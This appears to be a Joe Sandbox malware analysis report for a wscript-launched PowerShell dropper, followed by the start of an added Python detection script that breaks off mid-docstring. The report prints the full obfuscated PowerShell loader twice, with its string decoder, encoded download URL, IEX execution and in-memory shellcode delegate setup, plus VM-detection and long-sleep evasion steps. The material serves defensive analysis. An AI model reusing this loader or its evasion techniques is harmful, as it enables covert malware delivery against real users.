            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: ystem.Core.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080D0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb. source: powershell.exe, 00000006.00000002.2992466321.00000000080E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straaleplet", "Unsupported parameter type 00000000")
            Source: Yara match File source: 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Strains)$gLObal:enomANIa = [SystEM.TeXT.ENcoDINg]::asCii.gETstrinG($LuFtanGrebS)$GlObal:acORNS=$enOManIa.sUbStRing($aGrEEs,$UnAnaLyTiC)<#Evacuates Oceanicity Sousafon Anacletica Bron
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Bagtrapperne $Chemoreception $Erhvervsdrivende), (Lemniscata @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hamald30 = [AppDomain]::CurrentDomain.GetAssem
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Semicolumnar)), $Ergatocracy247).DefineDynamicModule($Stiltlike, $false).DefineType($Bemestrer, $Skrdders, [System.MulticastDelegate])
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Strains)$gLObal:enomANIa = [SystEM.TeXT.ENcoDINg]::asCii.gETstrinG($LuFtanGrebS)$GlObal:acORNS=$enOManIa.sUbStRing($aGrEEs,$UnAnaLyTiC)<#Evacuates Oceanicity Sousafon Anacletica Bron
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA4BFA pushad ; retf 3_2_00007FFD9BAA4C11
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA56CC push ds; iretd 3_2_00007FFD9BAA56DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA46BC push edi; retf 3_2_00007FFD9BAA46DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA46AC push ebp; retf 3_2_00007FFD9BAA46BA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA461C push ecx; retf 3_2_00007FFD9BAA462A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA462C push esp; retf 3_2_00007FFD9BAA46AA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA458C push eax; retf 3_2_00007FFD9BAA461A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA7564 push ebx; iretd 3_2_00007FFD9BAA756A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA09CA push E95AE6D0h; ret 3_2_00007FFD9BAA09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA55BD push es; iretd 3_2_00007FFD9BAA55D2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA0942 push E95AE6D0h; ret 3_2_00007FFD9BAA09C9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFD9BAA00BD pushad ; iretd 3_2_00007FFD9BAA00C1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02DF3F9A push esp; retf 6_2_02DF3FC9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_074DCF55 push esp; iretd 6_2_074DCF5D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_074DAD06 pushfd ; ret 6_2_074DAD11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_074DE5A8 push esp; retf 6_2_074DE5A9
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
            Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (78 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (48 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4214
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5697
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6975
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2737
            Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 5225
            Source: C:\Windows\System32\wscript.exe TID: 6668 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4428 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5816 | Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: powershell.exe, 00000003.00000002.1879310983.0000021AB15E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW9
            Source: wscript.exe, 00000000.00000003.1694250405.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692511398.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1705228626.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693202979.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694132629.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702191614.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703367257.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693904891.000002343CD40000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWm7"
            Source: wscript.exe, 00000000.00000003.1694250405.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692511398.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694250405.000002343CCD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694132629.000002343CCCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1705228626.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703367257.000002343CCD4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1704114347.000002343CCD6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693986988.000002343CCCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1693202979.000002343CD48000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1694132629.000002343CD40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1692910976.000002343CCB1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.1705458139.000002343CD95000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b};
            Source: C:\Windows\System32\wbem\WMIC.exe | Process information queried: ProcessInformation
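Two of the evasion entries above are visible in ordinary process-creation telemetry long before any sandbox verdict: WMIC.exe issuing the Win32_DiskDrive caption/serial-number query on behalf of wscript.exe (a common way to fingerprint virtual disks), and the script host handing off to powershell.exe with a command line that carries its own string decoder. The delay value 922337203685477 is Int64.MaxValue / 10000, i.e. [TimeSpan]::MaxValue expressed in milliseconds, so the sleep is effectively unbounded; that is why the report notes execution stopping while the process slept, and it is not something a process-creation rule can see. The following triage script is an added example, not part of the Joe Sandbox report: it runs rules for the observable parts of the chain over Sysmon Event ID 1-style records. The sample records are constructed for the example, and the numeric thresholds are assumptions rather than values the report states.

```python
"""Triage of process-creation events for the wscript -> WMIC / PowerShell chain.

Added example, not part of the Joe Sandbox report. The rules encode what the
report flags around this chain: a Windows Script Host process spawning
powershell.exe, WMIC.exe issuing the Win32_DiskDrive serial-number query
(the VM check) on behalf of a script host, and a very long PowerShell command
line that carries its own decoder function and many quoted literals. Input is
a list of Sysmon Event ID 1-style records (Image, ParentImage, CommandLine,
ProcessId); the sample records below are constructed for this example, and
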